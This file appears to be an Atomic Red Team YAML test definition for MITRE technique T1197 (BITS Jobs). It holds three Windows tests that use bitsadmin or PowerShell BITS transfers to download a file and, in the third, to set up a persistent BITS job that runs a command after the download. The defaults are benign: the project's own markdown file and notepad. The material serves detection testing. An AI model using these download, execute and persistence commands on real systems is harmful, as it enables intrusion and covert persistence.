Michael Haag
820ed2e465
* Update T1197.yaml Fixed issue #463 Fixed issue #464 * Generate docs from job=validate_atomics_generate_docs branch=t1197
81 lines
2.7 KiB
YAML
81 lines
2.7 KiB
YAML
---
|
|
attack_technique: T1197
|
|
display_name: BITS Jobs
|
|
|
|
atomic_tests:
|
|
- name: Download & Execute
|
|
description: |
|
|
This test simulates an adversary leveraging bitsadmin.exe to download
|
|
and execute a payload
|
|
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
remote_file:
|
|
description: Remote file to download
|
|
type: url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
|
|
local_file:
|
|
description: Local file path to save downloaded file
|
|
type: path
|
|
default: C:\Windows\Temp\bitsadmin_flag.ps1
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}
|
|
- name: Download & Execute via PowerShell BITS
|
|
description: |
|
|
This test simulates an adversary leveraging bitsadmin.exe to download
|
|
and execute a payload leveraging PowerShell
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
remote_file:
|
|
description: Remote file to download
|
|
type: url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
|
|
local_file:
|
|
description: Local file path to save downloaded file
|
|
type: path
|
|
default: C:\Windows\Temp\bitsadmin_flag.ps1
|
|
executor:
|
|
name: powershell
|
|
command: |
|
|
Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file}
|
|
|
|
- name: Persist, Download, & Execute
|
|
description: |
|
|
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
|
|
and execute a payload in multiple steps. This job will remain in the BITS queue for 90 days by default if not removed.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
bits_job_name:
|
|
description: Name of BITS job
|
|
type: string
|
|
default: AtomicBITS
|
|
remote_file:
|
|
description: Remote file to download
|
|
type: url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
|
|
local_file:
|
|
description: Local file path to save downloaded file
|
|
type: path
|
|
default: C:\Windows\Temp\bitsadmin_flag.ps1
|
|
command_path:
|
|
description: Path of command to execute
|
|
type: path
|
|
default: C:\Windows\system32\notepad.exe
|
|
command_line:
|
|
description: Command line to execute
|
|
type: string
|
|
default: C:\Windows\Temp\bitsadmin_flag.ps1
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
bitsadmin.exe /create #{bits_job_name}
|
|
bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
|
|
bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} #{command_line}
|
|
bitsadmin.exe /complete AtomicBITS
|
|
bitsadmin.exe /resume #{bits_job_name}
|